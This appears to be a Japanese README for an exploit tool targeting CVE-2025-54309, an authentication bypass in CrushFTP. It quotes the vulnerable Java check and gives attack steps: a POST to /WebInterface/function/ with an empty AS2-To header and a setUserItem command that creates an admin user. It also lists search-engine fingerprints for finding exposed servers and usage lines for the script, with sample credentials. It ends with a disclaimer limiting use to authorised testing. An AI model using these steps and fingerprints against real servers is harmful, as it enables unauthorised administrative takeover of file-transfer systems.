
CrushFTP AS2 認証バイパス
CVE-2025-54309 は、CrushFTP における認証バイパスの脆弱性であり、AS2 ヘッダーの操作を通じて不正な管理ユーザー作成を可能にします。
crushftp/server/ServerSessionHTTP.javaloginCheckHeaderAuth() (2285 行)} else if (this.headerLookup.containsKey("as2-to".toUpperCase())) {
if (this.headerLookup.getProperty("as2-to".toUpperCase()).trim().indexOf("-_-") < 0 && !ServerStatus.BG("blank_passwords")) {
return; // Authentication bypass occurs here
}
/WebInterface/function/ に空の AS2-To ヘッダーを含む POST リクエストを送信するsetUserItem コマンドを含める-_- デリミタがないため、サーバーが認証をバイパスするhttp.server_hash:525710691,-1319113083,2114359341,1401270286,-608770667http.favicon.hash:-1022206565"/WebInterface/w3c/p3p.xml"intitle:"CrushFTP WebInterface"inurl:"/WebInterface/login.html"python3 cve_2025_54309.py <target_url> [-u username] [-p password] [-v]
# Basic exploitation
python3 cve_2025_54309.py http://crushftp.example.com:8080
# Custom credentials
python3 cve_2025_54309.py https://crushftp.example.com -u kali -p kali1
# With login verification
python3 cve_2025_54309.py http://crushftp.example.com -v
このツールは、許可されたセキュリティテストのみを目的としています。ユーザーは、適用される法律および規制の遵守について責任を負います。